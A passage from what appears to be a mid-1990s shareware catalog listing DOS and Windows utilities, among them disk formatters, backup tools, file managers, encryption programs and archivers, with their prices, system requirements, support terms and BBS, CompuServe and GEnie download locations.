GEnie, mail support; all ASP- + wide offers (see page 6). 3-month free upgrading allowed. + Look for: availability unknown on BBSs; FF23.ZIP on CompuServe in + CIS:IBMHW forum LIBrary 0 (or contact userID 72060,1153 for + assistance). + Download size: 87k (about seven minutes with a 2400 baud modem) + Description: + Formats all styles of standard DOS disks, as well as non-DOS + disks, and customized DOS disks (i.e you can make up your own + copy protection schemes.) Gives complete control over + formatting parameters such as sector size, disk density, # of + sectors and tracks. Menu driven, user configurable formatting + parameters. + + + Product: Jason's File Finder + DOS file finder, searches multiple drives. See full + description on page 19. + + Product: MAXI Form + Author: Herne Data Systems Ltd, 519-366-2732 + Version: 1.8 (12-01-93) + Needs: IBM PC, DOS 3.2 or better. Program can run safely on a + system with no hard disk and only one floppy disk drive; CGA + monitor; Dual 720k floppy drives. 360k/720k/1.2meg/1.44meg + floppy drive. + Registration fee: $10.00 (add $2.00 for shipping to U.S. + addresses) (add $2.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of phone, fax, CompuServe, GEnie, mail support. 2-month + free upgrading allowed. + Look for: availability unknown on BBSs; MAXI*.ZIP on CompuServe + in CIS:IBMHW forum LIBrary 1 (or contact userID 72060,1153 for + assistance); MAXI*.ZIP on GEnie in IBMPC forum LIBrary 0 (or + contact userID MIKLOS.G for assistance). + Download size: 59k (about five minutes with a 2400 baud modem) + Description: + A floppy disk formatting program that gives more space on a + disk: 360k disks are expanded to 420k, 720 becomes 800k, 1.2 + meg becomes 1.4 meg and 1.44 meg is boosted to 1.6 meg. The + disks are user transparent to DOS version 3.20 or later and can + be used interchangeably with normal DOS disks. + + Chapter 2, "Utilities" 31 + + + + Product: MEG SYSTEM INFO GRAPHS PIE 3-D + Colorful system info Disk% MEMORY% 3-D pie. See full + description on page 142. + + Product: PDEL + Safe/Precise DOS delete. Extensive features. See full + description on page 21. + + Product: PS-SLEEVE + PostScript floppy storage sleeve printer. See full description + on page 116. + + Product: Reconcile + Selectively copy files across disks/directory. See full + description on page 57. + + Product: WINIMAGE + Author: Vollant Gilles + Version: 1.11 (09-15-93) + Needs: IBM 80386, Windows 3.1 or better. 4096k RAM; Hard disk. + Strongly recommended: Mouse. + Registration fee: $20.00 + Registration benefits: 31/2" master disk(s); 3 months of unlimited + CompuServe, mail support; all ASP-wide offers (see page 6). + Look for: WINIMA*.ZIP on BBSs; WINIMA.ZIP on CompuServe in + CIS:WINSHARE forum LIBrary 7 (or contact userID 100144,2636 for + assistance). + Download size: 200k (about 15 minutes with a 2400 baud modem) + Description: + Make disk image from floppy, extract file from image, make an + empty image, inject file on it and put the image on blank disk. + Toolbar, status bar, 3D-look, drag & drop client and server. + Change image format, defragment, delete file on image and + better usability. + + + Product: WinUpD8R + Author: Open Windows, 719-531-0403 + Version: 4.1 (03-12-95) + Needs: IBM AT (80286), Windows 3.1 or better. 512k RAM; VGA + monitor; Hard disk. + Strongly recommended: Mouse. + Registration fee: $29.95 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 6 + months of fax, CompuServe, mail support; lifetime return + policy; bonus utilities; disks of other shareware; discounts on + other products; discounts on upgrades. + Look for: UPD8R_41.ZIP on BBSs (call 703-680-9269 to download it + at no charge); UPD8R.ZIP on CompuServe in CIS:WINSHARE forum + LIBrary 2 (or contact userID 75236,3243 for assistance); + + Chapter 2, "Utilities" 32 + + + + UPD8R_41.ZIP on GEnie in WINDOWS RT forum LIBrary 11 (or + contact userID NA for assistance). + Download size: 281k (about 21 minutes with a 2400 baud modem) + Awards & nominations: 1994 finalist, PC Magazine/Ziff-Davis + Interactive Shareware Awards. + Description: + If you use "floppy net" to move files back and forth between + computers, you need WinUpD8R! It can automatically keep your + files up-to-date on multiple machines while providing triple- + redundant backup of your data in the process. Many available + modes, including batch operation. No cables or modem transfers + necessary. + + + 2.1.3.1 Disk duplicating + + Product: Master Disk + Author: Rosenthal Engineering, 805-541-0910 + Version: 2.0 (10-24-93) + Needs: IBM PC, DOS 3.1 or better. 64k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Registration fee: $179.00 + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of unlimited mail support; all ASP-wide offers (see + page 6). + Look for: MASTER20.ZIP on BBSs (multiple files) (call + 805-528-6172 to download it at no charge). + Download size: 73k (about six minutes with a 2400 baud modem) + Description: + Prepares floppy diskettes used as masters for software + duplication and distribution. Software duplicated from these + originals are more reliable and resistant to virus + contamination. It examines the diskette and drive for flaws and + errors, and verifies the quality and integrity as being + suitable for use as the original master, fills unused sectors + and boot tracks with special security code. Documentation + includes extensive anti-virus test data. + + Chapter 2, "Utilities" 33 + + + + Product: SAB Diskette Utility + Author: Stewart A. Berman + Version: 2.50 (01-01-94) + Needs: IBM AT (80286), Windows 3.1 or better. Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Registration fee: $20.00 (add $7.50 for shipping to U.S. + addresses) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited CompuServe, mail support. 6-month free + upgrading allowed. + Look for: SABDU250.ZIP on BBSs; SDU250.ZIP on CompuServe in + CIS:WINSHARE forum LIBrary 8 (or contact userID 76366,1664 for + assistance). + SWREG#: 1256 + Download size: 300k (about 23 minutes with a 2400 baud modem) + Description: + The Windows diskette utility. Using disk drives under Windows + is easy & efficient when you can: + * Format/copy/compare/save floppy diskette images in + foreground or background + * Read a diskette once and make multiple copies + * Save images to hard drive + * Convert diskette image formats while preserving boot and + reserve sectors + * Create distribution sets with group restores + * Browse diskettes and saved diskette images + Includes extensive online help + + + 2.1.3.2 Disk formatting + + Product: SAB Diskette Utility + Format/copy/convert/save diskette images. See full description + on page 32. + + 2.1.4 Directory utilities + + Product: ACZAR for DOS + Powerful archive/compression shell for DOS. See full + description on page 46. + + Product: ACZAR for Windows [***] + Windows archive/compression shell. See full description on + page 47. + + Chapter 2, "Utilities" 34 + + + + Product: SuperDIR [***] + Author: Cottonwood Software, 913-663-3022 + Version: 1.1 (08-20-95) + Needs: IBM PC, DOS 3.0 or better. 256k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Strongly recommended: Hard disk. + Registration fee: $17.00 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; quick-reference card; choice of 31/2" or 51/4" master + disk(s); lifetime unlimited phone, fax, BBS, CompuServe, mail + support; lifetime limited return policy; royalty-free source + code; all ASP-wide offers (see page 6); discounts on other + products; discounts on upgrades. 12-month free upgrading + allowed. + Look for: availability unknown on BBSs; SUPDIR.ZIP on CompuServe + in CIS:PCUTIL forum LIBrary 2 (or contact userID 75264,1630 for + assistance). + SWREG#: 5329 + PsL#: 11950 + Download size: 50k (about four minutes with a 2400 baud modem) + Description: + A DIR-type utility with include/exclude filters. Also formats + for DB import, multiple include and exclude file and directory + masks, many sorting, filtering, and output options, can sort + ALL files in tree (not just within each subdirectory). Comma, + tab, and space delimited output can be piped to a file or to a + DOS program. (For example, pipe all .BAK files to a utility to + delete them.) Source is royalty-free object-based C++. + + + Product: XFile + Multifunction desktop utility for Windows. See full + description on page 147. + + + 2.2 File utilities + + Product: 4DOS + Replacement for traditional command processor. See full + description on page 120. + + Product: 4DOS for Windows NT + Replacement for Windows NT command processor. See full + description on page 120. + + Chapter 2, "Utilities" 35 + + + + Product: 4FILES [***] + Author: Hand-Crafted Software, 907-747-8996 + Version: 3.23 (08-25-95) + Needs: IBM PC, DOS 3.0 or better. 128k RAM. + Strongly recommended: 4DOS or NDOS. + Registration fee: $30.00 + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, fax, BBS, CompuServe, + GEnie, mail support; 1-month return policy; bonus utilities; + all ASP-wide offers (see page 6); disks of other shareware; + discounts on upgrades. 1 free update disk(s) sent out. + Look for: 4FILE323.ZIP on BBSs (call 718-837-3236 to download it + at no charge). + PsL#: 10574 + Download size: 112k (about nine minutes with a 2400 baud modem) + Description: + System enhancer & file manager makes all of your work easier! + * Combines fast directory navigation with finger-tip + launching & loading of your data files & utilities + * File management functions & archiving support 4DOS/NDOS + file descriptions + * Works from a sortable directory listing that shows and + edits file descriptions + * Runs well with DOS, OS/2, Windows & DESQview + * Easy on-the-fly configuration & registration branding + * Recommended by 9/94 PC Computing magazine + + + Product: 4OS2 + Replacement for OS/2 command processor. See full description + on page 121. + + Product: ComeBack + Author: MicroTools Inc, 203-651-6170 + Version: 3.0 (01-06-94) + Needs: IBM PC, DOS 2.11 or better. 512k RAM; CGA monitor; + Hercules monitor; Hard disk. + Registration fee: $25.00 + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, fax, BBS, CompuServe, + mail support; all ASP-wide offers (see page 6); disks of other + shareware. Lifetime free upgrading allowed. + Look for: availability unknown on BBSs. + Download size: 300k (about 23 minutes with a 2400 baud modem) + Description: + Can recover files that were deleted or even overwritten. It + can recover files even after you have written over the + directory entry. Easy to use. No searching through sectors. + Mouse/Hot key user interface makes recovering files a snap. + Works on all size hard drives. Over 40,000 registered users of + this product swear by it! + + Chapter 2, "Utilities" 36 + + + + Product: CommEx [***] + Common dialog extensions for Windows 3.1/3.11. See full + description on page 214. + + Product: DizView + Author: Lincoln Beach Software, 314-861-1500 + Version: 2.0 (06-09-95) + Needs: IBM PC, DOS 3.0 or better. + Registration fee: $15.00 + Registration benefits: Full program functionality; 31/2" master + disk(s); 3 months of unlimited fax, BBS, CompuServe, mail + support; all ASP-wide offers (see page 6); discounts on + upgrades. + Look for: DIZVUE20.ZIP on BBSs (call 317-784-2147 to download it + at no charge); DIZVUE.ZIP on CompuServe in CIS:IBMAPP forum + LIBrary 0 (or contact userID 70700,630 for assistance). + PsL#: 11790 + Download size: 66k (about five minutes with a 2400 baud modem) + Description: + Catalog all your ZIP files! Ever wonder just what all those + ZIP files were? Now you can look at them without opening every + one of them manually. This will gather all of the FILE_ID.DIZ + files from your archives in a directory and put them in menu to + view by files or by subdirectory. Now you can catalog all of + your directories, edit each description and resave it to the + catalog and your ZIP file. Sysops!! Now create a custom + FILES.BBS file for your BBS. + + + Product: DO + Author: RobiNets, 702-827-4682 + Version: 4.3 (01-01-95) + Needs: IBM PC, DOS 2.1 or better. + Registration fee: $29.00 (add $5.00 for shipping outside U.S. or + Canada) + Registration benefits: printed manual; quick-reference card; + choice of 31/2" or 51/4" master disk(s); lifetime unlimited phone, + fax, CompuServe, mail support; bonus utilities; bonus data. + Lifetime free upgrading allowed. + Look for: DO.ZIP on BBSs. + Download size: 90k (about seven minutes with a 2400 baud modem) + Description: + A text/binary file utility. Find, replace; sort FAST; tag lines + within range; cut columns; Mac/UNIX/DOS; glue 2 files side-by- + side; merge sorted files; remove blank &/or duplicate lines; + paragraphs from lines or converse; expand tabs; filter by high + bits, number, letter, control characters, numbers, other; + insert strings at a given column; produce upper/lower/mixed + case; remove/compress white space; more. Supports redirection. + Includes PEEK, PSORT. + + Chapter 2, "Utilities" 37 + + + + Product: Double Directory + Author: 100% Cotton Software, 717-289-4019 + Version: 1.40 (06-01-93) + Needs: IBM PC, DOS 2.0 or better. 272k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Registration fee: $15.00 (add $3.00 for shipping outside U.S. or + Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited phone, mail support; bonus utilities; disks + of other shareware. + Look for: DBLDIR14.ZIP on BBSs. + Download size: 127k (about ten minutes with a 2400 baud modem) + Description: + A file and disk manager that displays 2 directories side-by- + side. Scroll through both simultaneously. Compare them & tag + the differences. Copy, move, rename, delete, view, print and + change attributes of files. Sort, make, mask, and remove + directories. Shell to DOS or shell and run a program (w/ or w/o + Double Directory removed from memory). 25-, 43-, and 50-row + modes. Many configuration options. Point and shoot interface + and mnemonic commands. Context-sensitive help. + + + Product: File Finder for Windows + Powerful file finder for Windows 3.1. See full description on + page 214. + + Product: File Finder/Grouper + Author: EnGamma, 703-548-6869 + Version: 2.02 (04-16-95) + Needs: IBM PC, DOS 3.3 or better. 180k RAM. + Registration fee: $15.00 (add $3.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); 3 months of unlimited phone, CompuServe, + mail support; 1-month return policy; bonus data; all ASP-wide + offers (see page 6); disks of other shareware; registration + commissions. 24-month free upgrading allowed. + Look for: availability unknown on BBSs; FFG.ZIP on CompuServe in + CIS:PCSYS forum LIBrary 6 (or contact userID 71674,1747 for + assistance). + SWREG#: 1558 + Download size: 160k (about twelve minutes with a 2400 baud modem) + Description: + The best file finder! Use multiple date/time/size/day-of-week + ranges, attrib., text as criteria to find or exclude files and + group them for subsequent processing. Search ZIP/ARC/LZH/ARJ/ + ZOO. All or specified drives. Use *abc* wild cards. Create + database of files. Execute files or arbitrary DOS command for + each. Use relative date/time. Output is user configurable. + + Chapter 2, "Utilities" 38 + + + + Product: HandyDOS + File/disk, prof batching, video & menu utils. See full + description on page 142. + + Product: LOCATE + File find & maintenance for DOS/NetWare. See full description + on page 19. + + Product: MicroFox DOS Utilities + Author: MicroFox Company, 216-659-9489 + Version: 1.14 (05-05-95) + Needs: IBM PC, DOS 1.0 or better. 64k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Registration fee: US$10.00 (add US$2.00 for shipping to U.S. + addresses) (add US$3.00 for shipping to Canadian addresses) + (add US$5.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited phone, fax, BBS, CompuServe, mail support; + bonus utilities; all ASP-wide offers (see page 6); disks of + other shareware; discounts on other products. + Look for: UTL114.ZIP on BBSs (call 216-661-9065 to download it at + no charge); UTL114.ZIP on CompuServe in CIS:PCUTIL forum + LIBrary 0 (or contact userID 73057,3113 for assistance); + UTL114.ZIP on GEnie in IBMPC forum LIBrary 0. + Download size: 128k (about ten minutes with a 2400 baud modem) + Description: + MicroFox Utilites for DOS. Printer utilities. Batch file + utilities. Screen utilities. File utilities. + + + Product: PATTR + Author: Patri-Soft, 909-352-2820 + Version: 1.5 (11-05-90) + Needs: IBM PC, DOS 2.0 or better. + Registration fee: $19.00 + Registration benefits: 51/4" master disk(s). 3 months of support. + 1-month return policy. + Look for: PATTR15.ZIP on BBSs (call 909-352-2825 to download it + at no charge); PATTR.ZIP on CompuServe in CIS:IBMSYS forum + LIBrary 1 (or contact userID 76347,2477 for assistance). + Download size: 25k (about two minutes with a 2400 baud modem) + Awards & nominations: 1987 winner, Public Brand Software + contests for useful programs. + Description: + Sets DOS attributes for one or more files. Can process one or + more directories with a single command and advanced file + selection capabilities are provided. It is commonly used to + set or reset the DOS archive flag to cause or prevent files + from being processed by your favorite backup utility. + + Chapter 2, "Utilities" 39 + + + + Product: STEENBURGH's STUFF + 21 batch utilities, input, output, etc. See full description + on page 130. + + Product: Super Stuff Utilities + Windows based utilities that enhance Windows. See full + description on page 204. + + Product: WizManager + Fantastic File Manager add-on. See full description on + page 195. + + 2.2.1 Backup/restore + + Product: ACZAR for DOS + Powerful archive/compression shell for DOS. See full + description on page 46. + + Product: ACZAR for Windows [***] + Windows archive/compression shell. See full description on + page 47. + + Product: BakupWiz + Author: PCX, 619-259-9797 + Version: 3.29fl (01-03-92) + Needs: IBM PC, DOS 3.0 or better. 640k RAM; Hard disk. + Registration fee: $59.00 (add $5.00 for shipping to Canadian + addresses) (add $7.50 for shipping outside U.S. or Canada) + Registration benefits: printed manual; 31/2" master disk(s); + lifetime unlimited phone, fax, BBS, CompuServe, mail support; + 1-month limited return policy. 3-month free upgrading allowed. + Look for: BWIZ.ZIP on BBSs (call 619-481-6479 to download it at + no charge); BWIZ.ZIP on CompuServe in CIS:IBMSYS forum LIBrary + 6 (or contact userID 70216,174 for assistance). + Download size: 144k (about eleven minutes with a 2400 baud modem) + Description: + Quick & reliable: speeds greater than 2 megabytes per minute. + Flexible: back up all files, any files you select, or any + changed files. Network support: NetWare 286 and 386 including + Apple File Protocol are supported. Directory and file access + privileges and binderies are backed up while users are still + logged onto the system. Secure: uses a password system to + shield your data. Easy to use: pull-down menus, helplines, and + message windows. + + + Product: COMpanion + DOS personal network for up to 5 PCs. See full description on + page 428. + + Product: Crush + Create much smaller archives than PKZIP! See full description + on page 48. + + Chapter 2, "Utilities" 40 + + + + Product: Easy Backup + Author: Easy Software, 01625-614669 + Version: 4.5 (06-15-95) + Needs: IBM PC, DOS 5.0 or better. 512k RAM; Hard disk. + Registration fee: $25.00 + Registration benefits: 31/2" master disk(s); 3 months of unlimited + CompuServe, mail support; all ASP-wide offers (see page 6). + Look for: availability unknown on BBSs. + SWREG#: 3044 + PsL#: 11492 + Download size: 205k (about 15 minutes with a 2400 baud modem) + Description: + A no-frills compressed backup system. It backs up a single + directory (and any sub directories). There are no wildcard or + date stamp options. Perfect for anyone who regularly backs up + complete directory structures. Previous settings are stored in + a data file so that subsequent backups are simply selected from + a list. + + + Product: FSave + Author: KMR Consulting, 716-293-3241 + Version: 1.1 (03-15-95) + Needs: IBM AT (80286), DOS 3.1 or better. Program can run safely + on a system with no hard disk and only one floppy disk drive; + Hard disk. PKZIP or other compression/archiving program. + Registration fee: $17.95 (add $2.00 for shipping to U.S. + addresses) (add $2.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; choice of 31/2" or 51/4" master disk(s); 12 months of + unlimited phone, mail support; bonus utilities; disks of other + shareware; discounts on upgrades; registration commissions. 1 + free update disk(s) sent out. + Look for: FSAVE11.ZIP on BBSs; FSAVE1.ZIP on CompuServe in + CIS:IBMSYS forum LIBrary 6 (or contact userID 74034,1441 for + assistance). + Download size: 100k (about eight minutes with a 2400 baud modem) + Description: + Simplifies the task of saving files on your PC. You specify + which files on your PC can be recovered from other sources + (original media, BBSs, distribution diskettes, etc.). This + need only be done once. Then FSave only backs up the files + which cannot be gotten elsewhere. This makes your periodic + filesaves small, fast and easy. No special hardware (e.g. tape + drive) is needed. I regularly back up my 170 mb disk onto a + single 1.44 floppy. + + Chapter 2, "Utilities" 41 + + + + Product: GetBack + Author: MicroTools Inc, 203-651-6170 + Version: 2.4 (12-24-92) + Needs: IBM PC, DOS 2.1 or better. 640k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor; Hercules monitor; Hard disk. + Registration fee: $35.00 (add $4.00 for shipping to Canadian + addresses) (add $4.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; choice of 31/2" or 51/4" master disk(s); lifetime unlimited + phone, fax, BBS, mail support; 3-month return policy; bonus + utilities; disks of other shareware; discounts on other + products. + Look for: availability unknown on BBSs; GTBK22.ZIP on CompuServe + in CIS:IBMSYS forum LIBrary 6 (or contact userID 72077,437 for + assistance). + Download size: 350k (about 26 minutes with a 2400 baud modem) + Description: + A full featured GUI backup and restore utility (a text based + interface is also present for slower machines). Can backup up + to four megabytes per minute. Many outstanding features + including extensive online help, mouse support, file + compression, batch mode operation, point and click directory + tree selection, full, incremental and differential backups, and + multiple drive support. Formats floppies as needed or on + demand. Supports all DOS based networks. Multiple user + configurations available. + + + Product: Mass-Store Copy + Author: Informative Technologies, 202-675-4528 + Version: 2.6 (04-01-91) + Needs: IBM PC, DOS 3.1 or better. Hard disk; one removable disk + drive. + Registration fee: $59.00 + Registration benefits: Printed Manual with disk; one year of + Phone/FAX/mail/Email/BBS support;Certificate for $7 off a + subscription to Shareware Magazine; free CompuServe Membership. + Look for: MSCOPY??.ZIP on BBSs (call 301-596-1180 to download it + at no charge); MSC??.ZIP on CompuServe in CIS:PCHW forum + LIBrary 1 (or contact userID 74777,3004 for assistance). + Download size: 145k (about eleven minutes with a 2400 baud modem) + Description: + "Make copies of optical disks while using only one optical + drive!" Make backup copies of: + * Bernoulli Box disks + * Erasable Optical + * "Super Floppies" + * WORM Disks + * Removable/Portable hard drives + Backup copies of disks can be made while using only one + removable disk drive (No need to buy a second drive.). Copies + any size removable DOS disk, regardless of the available hard + disk space. Files larger than your hard drive can be copied. + + Chapter 2, "Utilities" 42 + + + + Product: MegaBack Hard Disk Backup + Author: Patri-Soft, 909-352-2820 + Version: 2.3 (04-27-93) + Needs: IBM PC, DOS 3.2 or better. 512k RAM; Hard disk. + Registration fee: $43.00 + Registration benefits: printed manual; 3 months of BBS support; + 1-month return policy; bonus utilities; discounts on upgrades. + Look for: MBACK230.ZIP on BBSs (call 909-352-2825 to download it + at no charge); MBACK.ZIP on CompuServe in CIS:IBMSYS forum + LIBrary 6 (or contact userID 76347,2477 for assistance); + MBACK23.ZIP on GEnie in IBMPC-615 forum LIBrary 5 (or contact + userID PATRISOFT for assistance). + Download size: 240k (about 18 minutes with a 2400 baud modem) + Description: + Provides painless backup. Professional features, yet easy to + use. Better than DOS 6 backup in several ways - the most + important being its storing of all backup data on one set of + sequentially numbered backup diskettes. Features: Diskette + formatting; file select/exclude; compression; spans files + across disks; multiple hard disks; appends incremental to full + backups; backup index; selective restore; menus; command line; + utilities; error recovery and more! + + + Product: Open Menu + Flexible fast general purpose menu program. See full + description on page 189. + + Product: PCOPY + The copy program "that DOS forgot" See full description on + page 20. + + Product: QIC-BAT for CMS + Author: Command Line Software, 970-667-4566 + Version: 1.2 (11-08-93) + Needs: IBM PC, DOS 2.1 or better. 512k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor; Hercules monitor. Colorado Memory Systems + backup software. + Strongly recommended: Mouse. + Registration fee: $20.00 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $6.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 12 months of unlimited phone, fax, BBS, + CompuServe, mail support; bonus utilities; all ASP-wide offers + + Chapter 2, "Utilities" 43 + + + + (see page 6). 12-month free upgrading allowed. Windows version + of QIC-BAT. + Look for: QICBAT12.ZIP on BBSs (call 970-663-5507 to download it + at no charge); QICBAT.ZIP on CompuServe in CIS:PCHW forum + LIBrary 17 (or contact userID 72673,357 for assistance). + SWREG#: 1067 + Download size: 260k (about 20 minutes with a 2400 baud modem) + Description: + This backup utility for Colorado tape drives unleashes the + power of your CMS tape backup software by providing access to + features not available using CMS's menu software. Creates + error-free backup batch files with just a few clicks of the + mouse. Multi-drive backups, mouse support, tag file generator, + on-line help, group drives and verification reports. + + + Product: Rosenthal UnInstall + Author: Rosenthal Engineering, 805-541-0910 + Version: 1.0 (04-25-94) + Needs: IBM PC, DOS 3.0 or better. 256k RAM; Hard disk. + Registration fee: $19.95 (Canadian dollars) (add $3.50 (Canadian + dollars) for shipping to U.S. addresses) (add $4.75 (Canadian + dollars) for shipping to Canadian addresses) (add $5.50 + (Canadian dollars) for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of unlimited mail support; LAN license; site license; + all ASP-wide offers (see page 6); disks of other shareware. + Look for: UNSTAL01.ZIP on BBSs (multiple files) (call + 805-528-6172 to download it at no charge). + Download size: 42k (about three minutes with a 2400 baud modem) + Description: + Automatically remove unwanted Windows & DOS programs, files, + directories and restore changes made to AUTOEXEC.BAT, + CONFIG.SYS, WIN.INI, SYSTEM.INI. Run it before you add anything + new to your system. At your option, changes can be kept, or + deleted, and the system completely returned to normal. + Safeguards provide display of all directories and files + (including hidden ones) for review and confirmation. This is an + absolute necessity for trying shareware. + + + Product: Stowaway True Archival System + Archive seldom used/inactive files to disks. See full + description on page 24. + + Product: Teleshare/DOS Remote Access [***] + Basic DOS remote control. See full description on page 445. + + Product: WinUpD8R + Work/home file transfer/update/backup utility. See full + description on page 31. + + Chapter 2, "Utilities" 44 + + + + Product: Zip Server(TM) + PKZIP 2.04g compatible Windows utility. See full description + on page 55. + + 2.2.2 File encryption + + See also: Utilities, Security programs. + + Product: BCM Menu System + Menu, disk maint,text editor & compress shell. See full + description on page 197. + + Product: DATA PROTECTOR + Protect your data against anauthorized access. See full + description on page 209. + + Product: File Maven + DOS file manager and file transfer utility. See full + description on page 192. + + Product: Flu_Shot+ + Virus detection/prevention via active monitor. See full + description on page 206. + + Product: FreeForm + Ultimate floppy disk formatting program. See full description + on page 29. + + Product: PC-Vault + Security system - access control & protection. See full + description on page 210. + + Product: PC-Vault Plus + Security system - access control & protection. See full + description on page 210. + + Product: Power Edit + Network text editor, email, file encryption. See full + description on page 429. + + Chapter 2, "Utilities" 45 + + + + Product: Puffer + Author: Kent Briggs + Version: 1.0 (05-25-95) + Needs: IBM AT (80286), Windows 3.1 or better. 2048k RAM. + Registration fee: $20.00 (add $1.00 for shipping to U.S. + addresses) (add $1.00 for shipping to Canadian addresses) (add + $3.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); 3 months of unlimited CompuServe, mail + support; all ASP-wide offers (see page 6). 160-bit encryption + key enabled in registered version. + Look for: PUFF10.ZIP on BBSs. + PsL#: 14046 + Download size: 182k (about 14 minutes with a 2400 baud modem) + Description: + A password-based data file and e-mail encryption utility for + Windows. Keep your personal, business, and electronic + transmitted data private. Uses the highly rated Blowfish + algorithm for fast, secure encryption and the Secure Hash + Algorithm (SHA) for key generation. Three output formats are + supported including binary, self-extracting executables, and + 7-bit text for Internet e-mail. Also includes a three-pass, + secure file wipe feature. + + + Product: Safe Program + Author: Regnoc Software, 510-806-0713 + Version: 1.00 (07-01-95) + Needs: IBM PC, Windows 3.0 or better. 4000k RAM; VGA monitor; + Hard disk; Mouse. + Registration fee: $40.00 (add $4.00 for shipping outside U.S. or + Canada) + Registration benefits: Full program functionality; printed + manual; quick-reference card; 31/2" master disk(s); 1 months of + phone, CompuServe, mail support; 1-month limited return policy; + all ASP-wide offers (see page 6). + Look for: availability unknown on BBSs. + SWREG#: 4936 + PsL#: 14106 + Download size: 308k (about 23 minutes with a 2400 baud modem) + Description: + Lock your files in a software safe and set the combination. + Mail the safe using any form of electronic mail. Anyone + receiving the file sees a closed safe, but can only access its + contents if they know the combinatoin. Accepts all types of + data from disk files, clipboard cut and paste, drag and drop, + OLE, etc. Visual and audio feedback in the user interface. + Windows 3.1 users may need to also install OLE 2.0 files. + + Chapter 2, "Utilities" 46 + + + + Product: WDN: Wipe Directory Names + Author: R.P.McCormick + Version: 1.20 (07-24-93) + Needs: IBM PC, DOS 3.0 or better. Program can run safely on a + system with no hard disk and only one floppy disk drive. + Registration fee: $5.00 (add $8.00 for shipping to U.S. + addresses) (add $8.00 for shipping to Canadian addresses) (add + $13.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited BBS, mail support; 1-month limited return + policy; bonus utilities; disks of other shareware. + Look for: WDN***.ZIP on BBSs (call DELPHI-&-AOL to download it at + no charge); WDN***.ZIP on GEnie in IBMPC forum LIBrary 5. + Download size: 47k (about four minutes with a 2400 baud modem) + Description: + Typically an empty directory takes up 2048 or 4096 bytes of + disk space. This seeks out and removes hidden & unused + directories with one command. After making copies of floppies + by copying them to a temporary directory on the hard drive you + will delete or wipe the files using Norton's Wipefile for + example. A directory "tree" is left behind, requiring you to + use DOS's RD command, and type in every name. RD leaves a + remnant of the old directory name on the disk, with only its + st + 1 character removed. + + + Product: Zip Pro + Full Zip/UnZip support for Windows 3.1. See full description + on page 54. + + 2.2.3 File archiving & compression + + Product: 4ZIP/4UNZIP + Includes 4DOS file descriptions in ZIP files. See full + description on page 219. + + Product: ACTION Process Automator + Triggers predetermined actions in Windows. See full + description on page 124. + + Product: ACZAR for DOS + Author: CZAR Software, 915-595-8787 + Version: 2.10 (10-23-93) + Needs: IBM AT (80286), DOS 3.2 or better. 527k RAM; CGA monitor; + Hercules monitor; Dual 720k floppy drives; Hard disk. + Strongly recommended: EGA monitor. + Registration fee: $35.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); lifetime unlimited phone, fax, BBS, + CompuServe, mail support; all ASP-wide offers (see page 6); + + Chapter 2, "Utilities" 47 + + + + discounts on other products; discounts on upgrades. 1 free + update disk(s) sent out. + Look for: ACZAR210.ZIP on BBSs (call 915-595-8705 to download it + at no charge); ACZAR2.ZIP on CompuServe in CIS:PCUTIL forum + LIBrary 6 (or contact userID 71031,3614 for assistance). + SWREG#: 420 + PsL#: 10939 + Download size: 320k (about 24 minutes with a 2400 baud modem) + Description: + Compare with SHEZ or ARCMASTER and see what you have been + missing. Very easy to use, but powerful! Mouse support, SAA/GUI + Interface, supports ZIP, ARJ, LZH, PAK, ARC, ZOO, SQZ, HYP, + ARCE, ARC128, ARC286, all SFX files, SCAN, built-in file viewer + + editor, revolu- tionary Drag & Drop functions, Backup/Restore + entire drives/directories using ZIP or ARJ, and much more! + + + Product: ACZAR for Windows [***] + Author: CZAR Software, 915-595-8787 + Version: 3.00 (08-18-95) + Needs: IBM PC, Windows 3.0 or better. 527k RAM; EGA monitor. + Strongly recommended: VGA monitor. + Registration fee: $35.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; 31/2" master + disk(s); lifetime unlimited phone, fax, BBS, CompuServe, mail + support; all ASP-wide offers (see page 6); discounts on other + products; discounts on upgrades. 1 free update disk(s) sent + out. + Look for: 